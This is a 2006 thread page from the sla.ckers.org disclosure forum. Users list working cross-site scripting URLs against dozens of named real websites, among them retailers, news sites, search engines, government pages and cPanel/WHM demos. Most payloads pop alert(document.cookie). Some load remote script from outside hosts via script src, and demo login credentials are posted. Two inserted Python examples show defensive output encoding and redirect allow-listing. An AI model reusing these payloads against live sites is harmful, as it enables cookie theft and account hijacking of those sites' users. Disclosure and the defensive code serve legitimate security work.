Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Current Page: 33 of 65
Re: So it begins
Posted by: Mephisto
Date: December 09, 2006 03:24AM

http://www.fordvillage.com/pages/present/flm/notlocalized/searchinventory/dosearch.asp?model=');</script><script>alert(document.cookie);</script>&vehicletype=Car&year=2007&qs=1

http://www.carthagefordmercury.com/pages/present/flm/notlocalized/searchinventory/dosearch.asp?model=');</script><script>alert(document.cookie);</script>&vehicletype=Car&year=2007&qs=1

http://www.republicford.com/pages/present/flm/notlocalized/searchinventory/dosearch.asp?model=');</script><script>alert(document.cookie);</script>&vehicletype=Car&year=2007&qs=1

Seems like all the Ford websites that use these scripts are vulnerable...

http://www.fbcneosho.com/templates/System/details.asp?id=22083&PG=';--></script><script>alert('xss');</script>//&Style=&RecordType=&pkg=

http://www.weather.com/search/search?where=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&what=Weather36HourUndeclared&x=18&lswe=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&lswa=Weather36HourUndeclared&GO=GO&whatprefs=&y=9&whatprefs=&GO=GO&lswe=&lswa=

http://www.taylormadehomes.com/search.asp "><script>alert('xss');</script>

http://search.bestwestern.com/?q=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&x=7&y=8

http://search.xanga.com/searchxanga.aspx?q="><script>alert('xss');</script>

http://usachambers.com/neosho/directory.asp <script>alert('xss');</script>

They filtered the input on numerous pages, but...
http://www.neoshodailynews.com/calendar/?showdate=<script>alert('xss');</script>&cal=default

Re: So it begins
Posted by: cheney_usa
Date: December 09, 2006 10:10PM

First posting:

"https://secure.myblackbook.org/error.aspx?aspxerrorpath="></script><script>javascript:alert('xss')</script>"

This site is supposed to securely keep your secrets.

Re: So it begins
Posted by: cheney_usa
Date: December 09, 2006 10:14PM

Second Posting:

I thought Freepers were strong on defense?

http://www.freerepublic.com/perl/resend

Put script in the screenname field, like "></script><script>javascript:alert('xss')</script>

Re: So it begins
Posted by: cheney_usa
Date: December 09, 2006 10:28PM

I guess I shouldn't expect much from philosophers.

http://www.philosophersnet.com/games/quiz.htm

Enter script in "Your Name".

Re: So it begins
Posted by: cheney_usa
Date: December 09, 2006 10:45PM

Send a loved one an erotic postcard from "The Erotic Sketchbook". Or an XSS.

First, pick out a lovely postcard: http://www.gradiva.com/postcard/ then hit "Write Card", which takes you to:
http://www.gradiva.com/cgi/card.cgi

Enter script in the "Name" fields and hit "Preview"

What a turn on!

Re: So it begins
Posted by: jungsonn
Date: December 10, 2006 08:23PM

Check out this one:

http://www.geograph.org.uk/search.php?i=669408

Look at the URI, no XSS. Well, go click on it; the XSS is stored!
Nifty, heh... it just stores your search query, so also XSS. *sigh*


http://www.centerforsecuritypolicy.org/index.jsp?section=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C%22
http://www.websense.com/securitylabs/alerts/search.php?Search=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.ds-osac.org/Search/index.cfm?display=keyword&query=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C%22
http://search.novell.com/qfsearch/SearchServlet?bbshow=true&bbindex=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E%3C%22&theme=&encoding=iso-8859-1&retencoding=iso-8859-1&lang=en&country=us&noredirect=&collection=&query=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%3C%22&hdrsrchsubmit=Search
http://www.gesecurity.com/portal/site/GESecurity/template.PAGE/menuitem.5ad454247f0dd40c8e6e9510c4030730/?javax.portlet.tpst=60ce1368aadd940c8e6e9510c4030730&javax.portlet.prp_60ce1368aadd940c8e6e9510c4030730_viewID=MY_PORTAL_VIEW&javax.portlet.begCacheTok=token&javax.portlet.endCacheTok=token
http://www.techworld.com/search/index.cfm?thecriteria=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E%3C%22
http://www.sciencedaily.com/search/?keyword=%5C%3CsCRIPT%3Ealert%28%22XSS%22%29%3C%2FsCRIPT%3E%5C
http://www.perfumeemporium.com/BulletinBoard/index.cfm?fragrance=-0000000000%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://www.fender.com/products/search.php?search=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
http://pin.primate.wisc.edu/search.php?words=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E%3C%22
http://kaos.erin.gov.au/search.php?query=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&theme=all
http://www.llewellyn.com/bookstore/search.php?sec=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.zdnetasia.com/search/?query=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%3C%22&collection=enterprise&x=14&y=2
http://www.intelliquestmedia.com/store/search.php?a=search&terms=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&srch=ALL
http://www.hidden-treasures.co.uk/search.php?search=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
http://www.bigstockphoto.com/search.php?photo_name=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&x=0&y=0
http://www.sgi.com/cgi-bin/search?q=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%3C%22&btnG=&client=sgi&proxystylesheet=http%3A%2F%2Fwww.sgi.com%2Fstyles%2Fnew%2Fsgi_xslt.html&output=xml_no_dtd&site=sgi

Cookie hell (I warned you :)
http://www.computerworld.com/action/search.do?command=basicSearch&searchTerms=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&x=0&y=0

Re: So it begins
Posted by: rsnake
Date: December 11, 2006 03:11PM

Thanks, cheney_usa and welcome to the forums! Way to come out with a bang.

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: digi7al64
Date: December 11, 2006 06:38PM

http://www.chicagotribune.com/search/dispatcher.front?Query=%22%3Balert%28%27xss%27%29%3B+y%3D%22&target=article

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: So it begins
Posted by: rsnake
Date: December 13, 2006 11:46AM

This is actually a cool idea for a site. Make people pay to send me emails. I'd make my family pay an arm and a leg. Anyway, they also have an XSS vuln:

https://www.boxbe.com/ama/reg_basic?usernm=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&x=0&y=0

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: nEUrOO
Date: December 14, 2006 06:19PM

Wanna see your stock options:
http://iracs.isg.de/eads/2005/chart_fr_2005.htm?ACTIVE=PSE&hist=12m&from=&to=&symb3=BA.NYS&TYPE=-1&CTYPE=0&AVG1=%22%3E%3Cscript%3Ealert('XSS');%3C/script%3E&AVG2=0

Should I feel ashamed about web security in France?
http://www.michelin.fr/fr/front/search.jsp?query=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E%3Ckikoo-lol=&ok.x=12&ok.y=8
http://vachercher.lycos.fr/cgi-bin/pursuit?query=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&x=10&y=13&tld=com&family=off&inpcatvalue=web&cat=web

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher



Edited 2 time(s). Last edit at 12/14/2006 06:34PM by nEUrOO.

Re: So it begins
Posted by: rsnake
Date: December 14, 2006 06:28PM

It appears XSS is going up! ;)

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: nEUrOO
Date: December 14, 2006 06:35PM

Didn't know what to do this evening...

It's comcastic
http://sitesearch.comcast.com/?q=%22%3B+alert%28%22XSS%22%29%3B+foo%3D%22&LevelNum=1&LevelId=1&sec=&c=com&corp=

Look at the title tag: the HTML entities are parsed, but not for the search... crazy
http://www.wordreference.com/es/translation.asp?tranword=%3Cscript%3Ealert(%22XSS%22);%3C/script%3E

https://www.gamasutra.com/php-bin/login.php?from=&email=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E%3C%22

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher



Edited 3 time(s). Last edit at 12/14/2006 07:33PM by nEUrOO.

Re: So it begins
Posted by: cheney_usa
Date: December 14, 2006 08:41PM

Netsmart? I don't think so.

http://www.undernet.com.cy/?q=%3Cscript%3Ejavascript:alert(document.cookie)%3C/script%3E

Re: So it begins
Posted by: cheney_usa
Date: December 14, 2006 08:54PM

Well at least they have a sense of humor.

http://www.laughteryoga.org/error.php

Insert script in the form fields. OOOOMMMMMMM!!!!!

Re: So it begins
Posted by: cheney_usa
Date: December 14, 2006 09:18PM

When you go to San Francisco, make sure and wear an XSS in your hair.

http://www.sfgate.com/cgi-bin/qws/ff/qr?term=%22%3E%3C%2Fscript%3E%3Cscript%3Ejavascript%3Aalert%28%27xss%27%29%3C%2Fscript%3E&Go=GO&Submit=S

Re: So it begins
Posted by: unsticky
Date: December 15, 2006 03:30PM

http://www.ip2phrase.com/ip2phrase.asp?template=%3Cscript%3Ealert('xss');%3C/script%3E

Re: So it begins
Posted by: Ghozt
Date: December 18, 2006 04:07PM

cPanel
http://demo.cpanel.net:2082/frontend/x/diskusage/index.html?showtree=%22%3E%3Cscript%20src=http://www.geocities.com/ghozt64/css.js%3F
http://demo.cpanel.net:2082/frontend/x/htaccess/dohtaccess.html?dir=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fgeocities.com%2Fghozt64%2Fcss.js%3F
Username: xdemo
Password: xdemo

WHM
http://demo.cpanel.net:2086/scripts/showbw?showres=&sortreq=used&month=12%22%3E%3Cscript%20src=http://geocities.com/ghozt64/css.js%3F&year=2006
http://demo.cpanel.net:2086/scripts2/addpkg?name=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fgeocities.com%2Fghozt64%2Fcss.js%3F&maxftp=unlimited&maxpop=unlimited&maxlst=unlimited&maxsql=unlimited&maxsub=unlimited&maxpark=0&maxaddon=0&cgi=1&quota=unlimited&bwlimit=unlimited&cpmod=x&featurelist=default
http://demo.cpanel.net:2086/scripts/killpkg?pkg=%22%3E%3Cscript%20src=http://geocities.com/ghozt64/css.js%3F&submit-domain=Delete
http://demo.cpanel.net:2086/scripts/editpkg?pkg=%22%3E%3Cscript%20src=http://geocities.com/ghozt64/css.js%3F&submit-domain=Edit
http://demo.cpanel.net:2086/scripts2/dofeaturemanager?action=addfeature&feature=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fgeocities.com%2Fghozt64%2Fcss.js%3F
http://demo.cpanel.net:2086/scripts/killdns?domain=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fgeocities.com%2Fghozt64%2Fcss.js%3F
http://demo.cpanel.net:2086/scripts/editzone?domain=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fgeocities.com%2Fghozt64%2Fcss.js%3F
http://demo.cpanel.net:2086/scripts/doeditmx?domain=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fgeocities.com%2Fghozt64%2Fcss.js%3F
http://demo.cpanel.net:2086/scripts/park?ndomain=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fgeocities.com%2Fghozt64%2Fcss.js%3F
http://demo.cpanel.net:2086/scripts2/domts2?domain=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fgeocities.com%2Fghozt64%2Fcss.js%3F
http://demo.cpanel.net:2082/frontend/x3/resellers/branding/delstyleconfirm.html?pkg=%22%3E%3Cscript%20src=http://geocities.com/ghozt64/css.js%3F
Username:demo
Password:demo

Ooh, that's gotta hurt.
There are probably more in cPanel, but the demo blocks quite a few features.
(Used a js file that's not on ckers.org to avoid any problems.)



Edited 6 time(s). Last edit at 12/18/2006 05:13PM by Ghozt.

Re: So it begins
Posted by: maluc
Date: December 18, 2006 04:35PM

Very nice..

-maluc

Re: So it begins
Posted by: jungsonn
Date: December 19, 2006 02:55AM

Clever finds Ghozt! *hands up*

Re: So it begins
Posted by: Hong
Date: December 19, 2006 10:36AM

Baidu, the biggest search engine in China.
http://www.baidu.com/s?tn=baiduadv&q1=&q6=%3e%3cscript%20src=http://ha.ckers.org/xss.js%3e

And the login page.
http://passport.baidu.com/?login&tpl=%22%3e%3cscript%3ealert(String.fromCharCode(88,83,83))%3c/script%3e

- Hong

Re: So it begins
Posted by: Torstein
Date: December 19, 2006 01:22PM

If we are doing foreign sites :P

Large Norwegian search engine:
http://sesam.no/search/?q=%22%3E%3CSCRIPT%3Ea%3D%2FXSS%2F%3Balert%28a.source%29%3C%2FSCRIPT%3E&c=d&x=39&y=9

Newspaper:
http://www.dagbladet.no/tekstarkiv/index.php?string=%22%3E%3CSCRIPT%3Ea%3D%2FXSS%2F%3Balert%28a.source%29%3C%2FSCRIPT%3E

TV Channel:
http://www.tvnorge.no/index_sok_html?area=internet&searchString=%22%3E%3CSCRIPT%3Ea%3D%2FXSS%2F%3Balert%28a.source%29%3C%2FSCRIPT%3E&submit=S%D8K

Some random page with lots of links:
http://dyn.nesteklikk.no/search/index.html?searchstring=%22%3E%3CSCRIPT%3Ea%3D%2FXSS%2F%3Balert%28a.source%29%3C%2FSCRIPT%3E&type=article&search.x=0&search.y=0

For looking up phone numbers etc.:
http://www.gulesider.no/gs/categoryList.c?q=%3CSCRIPT%3Ea%3D%2FXSS%2F%3Balert%28a.source%29%3C%2FSCRIPT%3E

Another newspaper:
http://nettavisen.by.com/nyheter.asp?so=filewrite%5Bd%5D&query=%22%3E%3CSCRIPT%3Ea%3D%2FXSS%2F%3Balert%28a.source%29%3C%2FSCRIPT%3E&Next.x=8&Next.y=7

Blogging site:
http://blogg.sol.no//search?q=%22%3E%3CSCRIPT%3Ea%3D%2FXSS%2F%3Balert%28a.source%29%3C%2FSCRIPT%3E

Social network site:
http://blink.dagbladet.no/search/pursuit.html?from_age=2000-09-28&to_age=1907-09-28&show_large_images=1907-09-28&nick=%22%3E%3C%53%43%52%49%50%54%3E%61%3D%2F%58%53%53%2F%3B%61%6C%65%72%74%28%61%2E%73%6F%75%72%63%65%29%3C%2F%53%43%52%49%50%54%3E&submit2=s%F8k

Found these months ago, in September. They all use this vector:

"><SCRIPT>a=/XSS/;alert(a.source)</SCRIPT>

I came to the point where I just remembered a site off the top of my head, pasted that vector into its search field and said "bingo!".

It's not really interesting anymore. It is more common for the XSS to succeed than to fail.



Edited 2 time(s). Last edit at 12/22/2006 10:04AM by Torstein.

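The vector Torstein quotes works because the leading `">` closes the attribute value and the tag it sits in, so the `<SCRIPT>` element that follows is parsed as markup; the `');</script>` vectors earlier in the thread do the same thing from inside a JavaScript string literal. The Python below is an added example (not code from the thread or from any of the sites listed): a search page that reflects the query into an attribute and into a JS string, beside the same page with output encoding chosen per context, with `html.parser` standing in for the browser tokenizer to count how many `<script>` elements each rendering really produces. The inputs are the attribute vector quoted in this post and a constructed JS-string vector of the shape posted earlier.

```python
import html
import json
from html.parser import HTMLParser

# Constructed test inputs. ATTR_VECTOR is the attribute-breakout vector quoted in
# the thread; JS_VECTOR has the shape of the script-string breakouts posted earlier.
ATTR_VECTOR = '"><SCRIPT>a=/XSS/;alert(a.source)</SCRIPT>'
JS_VECTOR = "');</script><script>alert(document.cookie);</script>"


def reflect_in_attribute(term: str, safe: bool) -> str:
    """Echo a search term back inside a quoted HTML attribute value."""
    if safe:
        # HTML attribute context: encode & < > " ' so the value cannot close the quote.
        term = html.escape(term, quote=True)
    return f'<input type="text" name="q" value="{term}">'


def reflect_in_script(term: str, safe: bool) -> str:
    """Echo a search term back inside a JavaScript string literal in a <script> block."""
    if safe:
        # JS string context: emit a JSON string literal (quotes and backslashes escaped),
        # then also escape < and > so a "</script>" inside the data cannot end the block.
        literal = json.dumps(term).replace("<", "\\u003c").replace(">", "\\u003e")
        return f"<script>var last = {literal};</script>"
    return f"<script>var last = '{term}';</script>"


class _Tokens(HTMLParser):
    """Record what a tokenizer sees: <script> start tags and <input> value attributes."""

    def __init__(self) -> None:
        super().__init__()
        self.script_tags = 0
        self.input_values = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        elif tag == "input":
            self.input_values.append(dict(attrs).get("value"))


def audit(markup: str) -> dict:
    """Parse rendered markup and report script elements and recovered attribute values.

    html.parser is a stand-in for the browser tokenizer here: if it sees a <script>
    start tag the template did not put there, a browser will see (and run) it too.
    """
    parser = _Tokens()
    parser.feed(markup)
    parser.close()
    return {"script_tags": parser.script_tags, "input_values": parser.input_values}


if __name__ == "__main__":
    for name, render, vector in [
        ("attribute", reflect_in_attribute, ATTR_VECTOR),
        ("script", reflect_in_script, JS_VECTOR),
    ]:
        print(name, "unencoded:", audit(render(vector, safe=False)))
        print(name, "encoded:  ", audit(render(vector, safe=True)))
```

The point of `audit` is that the attribute-encoded page gives back the original search term as the input's value and zero script elements, while the unencoded page gives an empty value and a script element the template never wrote; likewise the encoded script block keeps exactly one `</script>`, the real one. Encoding is per context: `html.escape` is the right call for an attribute and useless for a JS string, which is why the search-term-in-title case posted in this thread can be encoded in one place and broken in another.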
Re: So it begins
Posted by: Ghozt
Date: December 19, 2006 09:37PM

http://developer.mozilla.org/en/docs/Special:Nutch?language=en&start=0&hitsPerPage=10&query=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E&fulltext=Search

So, how's about that xpi PoC?

Re: So it begins
Posted by: rsnake
Date: December 19, 2006 11:43PM

Although that is probably the slowest XSS I've ever seen it's a great find! Way to go, Ghozt. Although developer.mozilla.org isn't in the exception list, that's exactly why you shouldn't even have an exception list at all.

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: Ghozt
Date: December 20, 2006 12:18AM

Ah, I was afraid of that. I'll poke around a bit more and check out Mozdev.

Re: So it begins
Posted by: jungsonn
Date: December 20, 2006 02:30AM

Ghe... strange, them Mozilla Corp boys are visiting my site all of a sudden.
Well, if you read this, Mozilla boys: I still have not received that extension developer t-shirt that was promised to developers almost 3 months ago!
Yeah, I can't stand it if people promise something and then just don't do it.

Nice job, Ghozt; it's pretty awful to have holes there.

Re: So it begins
Posted by: digi7al64
Date: December 20, 2006 09:31PM

http://www3.jcpenney.com/jcp/SearchDepartment.aspx?SearchString=--%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&JSEnabled=false&mscssid=6547fdc35e6a949a9863a7a4ccf7fc7a6xMnVNoV5aGoxMnVNoV5aGW200B0E5C8E816D70B8C88F7F638E2EB00EED0635503&cmResetCat=true&submit+search.x=9&submit+search.y=4

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: So it begins
Posted by: unsticky
Date: December 22, 2006 09:02AM

http://marcopolosearch.org/MPSearch/Alt_Results.asp?orgn_id=5&hdnPerPage=15&hdnFilter=&txtSearchFor='%3E%3Cscript%3Ealert('xss');%3C/script%3E&selUsing=all&session_id=20061222922103373016
http://www.communities.gov.uk/search/error.asp?start=0&perpage=10&col=ODPM&summary=yes&sort=rank&date1=&date2=&category=&doctype=&type=boolean&search=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E

Re: So it begins
Posted by: eyeced
Date: December 22, 2006 09:48AM

http://www.serif.com/search.asp
"><script>alert('hi');</script>

A software development company...

http://www.scienceandsociety.co.uk/search.asp
"><script>alert('hi');</script>

I'll keep editing this post as more come.

http://www.golfclubexchange.com/search.asp#keyword
"</span>"><script>alert('hi');</script>

http://www.renewal.net/Search.asp
enter script into the search field.

http://www.dfes.gov.uk/research/programmeofresearch/index.cfm?type=5&keywordlist1=0&keywordlist2=0&keywordlist3=0&andor=or&keyword=%3CSCRIPT%3Ealert%28%22eyeced%22%29%3B%3C%2FSCRIPT%3E&x=0&y=0

Be gentle with the .gov.uk, cba with getting arrested.



Edited 3 time(s). Last edit at 12/22/2006 04:10PM by eyeced.

Re: So it begins
Posted by: maluc
Date: December 22, 2006 04:22PM

From eyeced's redirect (which is actually a frame injection):

http://www.tritonboats.com/frames_static.asp?redir=javascript:alert('XSS')//

-maluc

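The `redir=javascript:` case maluc points at is a different failure from the search-box reflections in this thread: the parameter becomes a frame target, and a `javascript:` URL runs as script without any `<` or `>` ever appearing in the output, so HTML encoding alone does not help. The Python below is an added example, not code from the thread or from the site named above: an allow-list validator for a frame or redirect target that passes through only site-relative paths or absolute http(s) URLs on a host allow-list and falls back to a fixed default for everything else. `ALLOWED_HOSTS` and `DEFAULT_TARGET` are constructed placeholders.

```python
from typing import Optional
from urllib.parse import urlsplit

# Constructed allow-list and fallback; a real site would list its own hostnames here.
ALLOWED_HOSTS = {"www.example.com"}
DEFAULT_TARGET = "/home.html"


def safe_frame_target(raw: str, default: Optional[str] = DEFAULT_TARGET) -> Optional[str]:
    """Return a value that is safe to emit as a frame src or Location header.

    Accepts only (a) a site-relative path starting with a single "/" or
    (b) an absolute http(s) URL whose host is on the allow-list. Anything else,
    including javascript:, data:, vbscript:, scheme-relative "//host" forms and
    values carrying control characters, is replaced by the default target.
    """
    value = raw.strip()
    # Browsers strip or tolerate tabs, newlines and other control characters in ways
    # that can hide a scheme from a naive prefix check, and treat backslashes as
    # slashes, so reject both outright rather than trying to normalise them.
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in value) or "\\" in value:
        return default
    parts = urlsplit(value)
    if parts.scheme == "":
        # Relative reference: one leading slash is a path on this site; two is
        # scheme-relative and would point at another host.
        if value.startswith("/") and not value.startswith("//"):
            return value
        return default
    if parts.scheme.lower() not in ("http", "https"):
        return default
    host = (parts.hostname or "").lower()
    if host not in ALLOWED_HOSTS:
        return default
    return value


def is_allowed(raw: str) -> bool:
    """True when safe_frame_target would pass the value through unchanged."""
    return safe_frame_target(raw, default=None) is not None


if __name__ == "__main__":
    # Constructed sample inputs; the first is the vector shape shown in the post above.
    for candidate in [
        "javascript:alert('XSS')//",
        "//evil.example/frame.html",
        "/frames_static.asp",
        "https://www.example.com/pages/index.html",
    ]:
        print(repr(candidate), "->", repr(safe_frame_target(candidate)))
```

Checking the scheme through `urlsplit` rather than with `startswith("javascript:")` matters because scheme names are case-insensitive and the same check has to reject `data:` and `vbscript:` too; positively allow-listing `http`/`https` and the host is shorter and safer than listing schemes to block. Falling back to a fixed page instead of echoing an error keeps the user's value out of the response entirely.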
Re: So it begins
Posted by: eyeced
Date: December 23, 2006 02:13PM

I just thought that that was the most fitting place for it (Triton Boats).
